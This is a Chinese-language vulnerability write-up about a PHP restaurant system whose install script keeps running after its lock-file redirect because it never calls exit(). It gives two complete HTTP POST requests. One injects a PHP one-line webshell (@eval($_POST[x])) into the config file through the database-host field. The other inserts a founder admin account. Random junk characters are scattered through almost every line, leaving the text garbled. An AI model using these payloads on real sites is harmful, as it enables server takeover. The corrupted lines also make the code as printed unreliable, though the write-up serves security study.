问题出在 /install/index.php 文件。程序安装完成后，会在程序根目录下生成 install.lock 文件，而 /install/index.php 在判断 install.lock 是否存在时的处理存在错误。
- u& T) M; Q- l2 G<?php
3 A6 v k- }4 S- h6 ~/ Cif(file_exists("../install.lock")). r# j4 O& H# p* }* ^+ y R
{0 S% t) p8 R! I9 i- r3 K
header("Location: ../");//没有退出
) w' r3 }: y) p' U R% U}9 ^& z/ p# S; a3 c
& k+ u7 ~9 S3 v9 U. e/ @6 V
//echo 'tst';exit;1 C: u0 O/ [% e2 v! c
require_once("init.php");( |9 k# U( v' B5 A9 c9 j
if(empty($_REQUEST['step']) || $_REQUEST['step']==1)+ D$ S6 f$ j. d! Y" P, j
{
可见在 install.lock 已存在时，代码只是用 header() 做了 302 重定向，并没有 exit()，也就是说浏览器虽然被重定向，服务端后面的安装逻辑仍然会继续执行。header() 之后必须紧跟 exit()，否则这个锁文件检查形同虚设。在这里至少可以产生两个漏洞。
) q0 Y8 U e3 X/ q* d
1、getshell（很危险）
5 A( f2 Z5 N( r$ [/ ?9 Mif(empty($_REQUEST['step']) || $_REQUEST['step']==1)# l L/ o6 f4 k
{
. h8 A0 S0 y5 D0 D+ O( d1 H# ~$smarty->assign("step",1);
" f1 l% h* o6 ]) _7 e1 \# {3 e$smarty->display("index.html");8 O: T2 C N" z8 }, }) O4 H; c
}elseif($_REQUEST['step']==2)4 n! @7 z. E1 F# @$ t$ z
{
% a; k6 k( u- f- S. [; |! q $mysql_host=trim($_POST['mysql_host']);( i7 C' D" [# u3 ]" L# q, J# b7 O
$mysql_user=trim($_POST['mysql_user']); m& w* V' c6 o8 C: S+ t
$mysql_pwd=trim($_POST['mysql_pwd']);
: T9 m D/ H/ Q. z2 J* v/ r/ ?8 C3 y $mysql_db=trim($_POST['mysql_db']);
' |+ z2 r7 g F# _2 N $tblpre=trim($_POST['tblpre']);
' Y% E8 X- ?$ `6 d9 A $domain==trim($_POST['domain']);, x1 Q9 N6 Y- [ f \$ K
$str="<?php \r\n";
4 v$ }4 @2 D) K8 M $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";; a7 U* q: H+ }* e5 [
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";7 r: |) t8 A" _' S- U" P, \
$str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";
0 [! q, v6 v- i( l* `! P, v $str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";- D5 o" L* j" E2 a8 S
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";
# h& Y2 U X' r $str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";3 v2 P2 L7 a% a U d
$str.='define("DOMAIN","'.$domain.'");'."\r\n";
% j5 L9 ~% L9 V# l $str.='define("SKINS","default");'."\r\n";
& f; M- g9 ^1 [: a- g; I- _" l $str.='?>';
$ o4 q/ W. Q8 j0 b2 \ file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
上面的代码把 POST 提交的数据未经任何校验和转义就直接拼接进 PHP 源码并写入 ../config/config.inc.php 文件，因此提交如下 POST 包即可写入一句话木马。
) G: q4 i. y6 d( U+ `" APOST /canting/install/index.php?m=index&step=2 HTTP/1.1
# s8 s4 m7 Z4 A0 Z+ L0 ` F$ CHost: 192.168.80.129' f: M/ A: M5 P* `7 V# ]+ T0 d+ F' O0 k. S
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0. ]* F& B/ H' [ } }/ S- {
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
* b0 d3 ?8 i" W: b' kAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.33 E& b# z) e4 X
Accept-Encoding: gzip, deflate, o4 Y* ^: W1 Y% W6 v
Referer: http://192.168.80.129/canting/install/index.php?step=1
& A, d" l) w. W jCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
0 q4 H3 u$ {& c, p" `0 o; SContent-Type: application/x-www-form-urlencoded
4 s1 ?8 Z4 k4 j# j T( rContent-Length: 126/ U. I9 G: W! v9 w# B( f
h1 V, P9 T3 Y
mysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
但是这个方法很危险：它会覆盖原有的配置文件，导致网站无法运行。
" d) _. |+ Y4 t2 j% G4 y, v! }, t/ m/ W7 Q
2、直接添加管理员
* b2 f- U4 [, s) [$ Xelseif($_REQUEST['step']==5)2 N% h3 _* {3 t: N/ `
{
. X+ Y! {8 A/ D( P if($_POST)
4 [1 T$ x4 J* \, ?9 H# H! B( f { require_once("../config/config.inc.php");
6 G# U, d- X- K6 p5 S7 W $link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
* T7 D! l$ a3 r( E1 @: q+ i0 h mysql_select_db(MYSQL_DB,$link);. @& H, f$ S9 {5 L( u4 Q2 q
mysql_query("SET NAMES ".MYSQL_CHARSET );
3 D. J) t, x6 f. f mysql_query("SET sql_mode=''");
. A5 P, e6 e8 A0 f& f9 L" T% D$ j. L
8 Y( Z. X5 }, F' W* s $adminname=trim($_POST['adminname']);
* O1 y9 K( p# o! g $pwd1=trim($_POST['pwd1']);
; l% u% d2 y" ]* X $pwd2=trim($_POST['pwd2']);
- b. w3 A, l3 k+ ]( S7 i if(empty($adminname))& G e# I: P: L8 `( h
{
$ a' f- Q% E3 \( D; X0 Y/ [& D* `; t" g
echo "<script>alert('管理员不能为空');history.go(-1);</script>";
& [# P0 d7 n( x$ [- J0 e" o6 C: Y exit();, P- }1 L/ g5 `- Y
}4 G: H4 x) l C* X& j5 o# Q7 I
if(($pwd1!=$pwd2) or empty($pwd1))# Y2 P+ j$ q; p
{
" a; [/ }9 O2 T$ w9 {: S echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出, ^+ W2 m- h& e5 m2 |# R( U
}
2 K& L# N+ {) a, Q mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
2 y. H4 s- r- x' ]- [* x; _( m) ~ }
这样一来，由于 step=5 的逻辑在 install.lock 已存在时仍会执行，就可以直接插入一个 qingshen/qingshen 的管理员帐号，请求如下：
7 _5 G; Y; d t: ]2 A' N9 M& XPOST /canting/install/index.php?m=index&step=5 HTTP/1.1
- C- }, G+ \3 |7 n# a jHost: 192.168.80.129" l+ j- M- ^1 S' f. ^
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
6 L" t5 c% b0 R& R/ `' }Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
% E3 f% T. n8 @ Y5 n: sAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3% h# ^# M4 e3 Z" s( p! d }* ~
Accept-Encoding: gzip, deflate
9 _3 t, J5 @6 c5 FReferer: http://www.2cto.com /canting/install/index.php?step=10 I& C0 l4 O4 V1 k0 v" T5 Q% [* B
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc428 F# `2 [! c& a
Content-Type: application/x-www-form-urlencoded2 N" }; X" K. j
Content-Length: 46
9 M7 F/ v0 {. \: n # n& b+ L( d" h4 s, |
adminname=qingshen&pwd1=qingshen&pwd2=qingshen! V, ^2 X9 Z9 ?( u: k8 Y7 _4 w
|